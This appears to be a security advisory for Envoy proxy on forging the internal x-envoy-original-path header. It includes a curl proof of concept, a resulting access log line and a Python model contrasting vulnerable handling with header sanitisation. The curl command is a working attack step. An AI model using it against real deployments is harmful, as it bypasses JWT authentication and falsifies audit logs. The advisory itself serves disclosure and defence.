Impact
Bypass JWT checks, forge fake original paths.
Affected components
Trace logs, gRPC logs, JWT filter.
Attack vector/s
The header x-envoy-original-path should be an internal header, but Envoy does not remove it from the request at the beginning of request processing when it is sent by an untrusted client.
The forged header value is then used for trace logs and gRPC access logs, in the URL that the jwt_authn filter matches its requirement rules against (when that filter is configured), and by any other upstream consumer of the x-envoy-original-path header.
Description
Trusted x-envoy-original-path header can be forged by attackers.
Example exploit or proof-of-concept
Client request:
$ curl -H "x-envoy-original-path: /fake" http://localhost:8080/real-path/
Access log, using the default log format:
[2023-02-28T19:26:53.660Z] "GET /fake HTTP/1.1" 200 - 0 3257 1 0 "-" "curl/7.82.0" "36174006-b793-4e40-8a38-a3d17a2a37a0" "localhost:8080" "172.18.98.50:8020"
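The log line above records /fake although the client actually requested /real-path/. The following Python model is an added illustration, not Envoy's code: it traces the header flow the advisory describes (the forged header steering both the logged path and the path the jwt_authn rules see) and contrasts it with the sanitisation a proxy must perform at its edge. The requirement-rule table and the trusted/untrusted peer flag are assumptions made for the example.

```python
# Added example (not Envoy's code): model of the x-envoy-original-path flow.
# Headers that only the proxy itself may set; the advisory covers this one.
INTERNAL_REQUEST_HEADERS = frozenset({"x-envoy-original-path"})

# Hypothetical jwt_authn requirement rules, in the style of the filter's
# path-prefix matching: (prefix, jwt required?). First match wins.
JWT_RULES = [
    ("/real-path", True),   # protected resource
    ("/", False),           # everything else is anonymous
]


def _lowercase_keys(headers):
    """HTTP header names are case-insensitive; normalise for lookups."""
    return {k.lower(): v for k, v in headers.items()}


def sanitize_request_headers(headers, from_trusted_peer):
    """Return a copy of the request headers. For requests arriving from an
    untrusted client, drop internal headers so nothing downstream can be
    steered by a forged value. Trusted peers (assumption: e.g. another proxy
    in the same mesh) keep them intact."""
    hdrs = _lowercase_keys(headers)
    if from_trusted_peer:
        return hdrs
    return {k: v for k, v in hdrs.items() if k not in INTERNAL_REQUEST_HEADERS}


def original_path(headers, request_path):
    """The path that access logs and the jwt_authn filter treat as the
    request's original URL: x-envoy-original-path when present, otherwise
    the path actually requested."""
    return _lowercase_keys(headers).get("x-envoy-original-path", request_path)


def jwt_required(path):
    """Evaluate the hypothetical requirement rules against a path."""
    for prefix, required in JWT_RULES:
        if path.startswith(prefix):
            return required
    return False


def handle_request(headers, request_path, from_trusted_peer, sanitize):
    """Simulate one request through the proxy. sanitize=False reproduces the
    vulnerable behaviour (the header is honoured from anyone); sanitize=True
    is the hardened behaviour. Returns the path the access log would record
    and whether a JWT would be demanded for the request."""
    hdrs = (sanitize_request_headers(headers, from_trusted_peer)
            if sanitize else _lowercase_keys(headers))
    path = original_path(hdrs, request_path)
    return {"logged_path": path, "jwt_required": jwt_required(path)}


if __name__ == "__main__":
    # Constructed request mirroring the curl command in the advisory.
    forged = {"Host": "localhost:8080", "X-Envoy-Original-Path": "/fake"}
    for sanitize in (False, True):
        print(f"sanitize={sanitize}: "
              f"{handle_request(forged, '/real-path/', False, sanitize)}")
```

With sanitisation off, an anonymous request for the protected /real-path/ is logged as /fake and evaluated against the anonymous rule, which is the JWT bypass the Impact section describes; with sanitisation on, the forged header from an untrusted client is discarded and the real path drives both logging and the requirement check.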